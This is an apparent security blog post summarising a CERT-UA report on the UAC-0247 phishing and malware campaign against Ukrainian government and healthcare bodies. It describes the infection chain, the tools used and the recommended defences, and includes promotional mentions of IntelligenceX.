Ukraine’s cybersecurity authority, CERT-UA, has uncovered a targeted cyber campaign aimed at government organizations and healthcare institutions, including clinics and emergency medical services. The operation, identified as UAC-0247, involves the delivery of sophisticated malware designed to extract sensitive data from Chromium-based browsers and WhatsApp environments.
The campaign was active between March and April 2026, and although the identity of the attackers has not yet been confirmed, the structure and execution of the attack indicate a capable and persistent threat group. This activity highlights how attackers are increasingly combining social engineering techniques with complex malware chains to infiltrate critical infrastructure.
Phishing as the Initial Entry Point
The attack begins with phishing emails crafted to resemble legitimate humanitarian aid proposals. This theme appears to be intentionally chosen to exploit trust and urgency, increasing the likelihood that recipients will engage with the message.
Victims are prompted to click on a link included in the email. Depending on the scenario, this link leads either to a compromised legitimate website or to a fake page generated using artificial intelligence tools. In the case of legitimate sites, attackers exploit cross-site scripting vulnerabilities to inject malicious content. Regardless of the approach, the ultimate goal is to convince the victim to download and execute a malicious file.
Execution Flow and Payload Delivery
Once the victim interacts with the malicious page, they are prompted to download a Windows shortcut (LNK) file. This file serves as the initial execution vector. When opened, it uses the Windows utility “mshta.exe” to launch a remote HTML Application (HTA).
The HTA file plays a dual role. It presents a decoy interface to maintain the appearance of legitimacy while silently initiating the download of a secondary payload. This payload injects shellcode into trusted system processes such as runtimeBroker.exe, allowing the malware to operate without drawing attention.
CERT-UA has also identified more advanced variants of the attack that utilize a two-stage loader. The second stage is implemented using a custom executable format that supports structured code execution and dynamic linking. The final payload is both compressed and encrypted, making analysis and detection more challenging.
Establishing Remote Access
A critical component of the campaign is the deployment of a reverse shell tool known as RAVENSHELL. This tool establishes a TCP connection with a command-and-control server, enabling attackers to execute commands remotely using standard system utilities like cmd.exe.
In addition to RAVENSHELL, attackers deploy a malware family called AGINGFLY along with a PowerShell script named SILENTLOOP. AGINGFLY, developed in C#, provides full remote control capabilities over the infected system. It communicates with its command server using WebSockets and can execute commands, log keystrokes, download files, and deploy additional payloads.
SILENTLOOP enhances the resilience of the attack by dynamically retrieving command-and-control server addresses from Telegram channels. It also includes fallback mechanisms to ensure continued communication even if primary channels are disrupted.
Data Exfiltration and Post-Compromise Activities
Analysis of multiple incidents linked to UAC-0247 shows that attackers focus heavily on reconnaissance and data theft. Their primary targets include browser-stored credentials, session data, and private communications.
To facilitate this, they deploy tools capable of bypassing browser encryption mechanisms and extracting stored passwords and cookies from Chromium-based applications. They also use specialized utilities to decrypt WhatsApp Web data, enabling access to user conversations.
Additional tools used in the campaign support network scanning, tunneling, and lateral movement, allowing attackers to expand their reach within compromised environments. Some components also include cryptocurrency mining capabilities, suggesting that financial motives may be part of the operation.
There are also indications that individuals associated with Ukraine’s defense sector have been targeted. In these cases, malicious archives were distributed through messaging platforms, further extending the scope of the campaign.
Why Detection Is Difficult
The techniques used in this campaign make it particularly challenging to detect. By leveraging legitimate system utilities, encrypted payloads, and multi-stage execution chains, attackers are able to bypass many traditional security measures.
This is where platforms like IntelligenceX can play an important role. By providing visibility into exposed infrastructure, malicious domains, and attacker behavior, IntelligenceX helps organizations identify threats before they escalate.
Security teams can use IntelligenceX to monitor suspicious domains, analyze command-and-control infrastructure, and correlate threat intelligence across multiple sources. This level of insight is essential when dealing with advanced and stealthy campaigns.
Recommended Defensive Measures
To reduce the risk associated with such attacks, CERT-UA recommends restricting the execution of potentially dangerous file types such as LNK, HTA, and JavaScript files. It is also important to limit the use of built-in Windows utilities like mshta.exe, PowerShell, and wscript.exe, which are frequently abused by attackers.
Organizations should also strengthen their monitoring capabilities, educate users about phishing risks, and integrate threat intelligence into their security operations.
Conclusion
The UAC-0247 campaign demonstrates how modern cyber threats are evolving in complexity and sophistication. By combining social engineering with advanced malware techniques, attackers are able to target critical sectors with increasing precision.
To effectively defend against such threats, organizations must adopt a proactive approach that includes improved visibility, intelligence-driven security, and strong internal controls. Leveraging platforms like IntelligenceX, along with robust cybersecurity practices, can significantly enhance an organization’s ability to detect and respond to these evolving threats.
Top comments (0)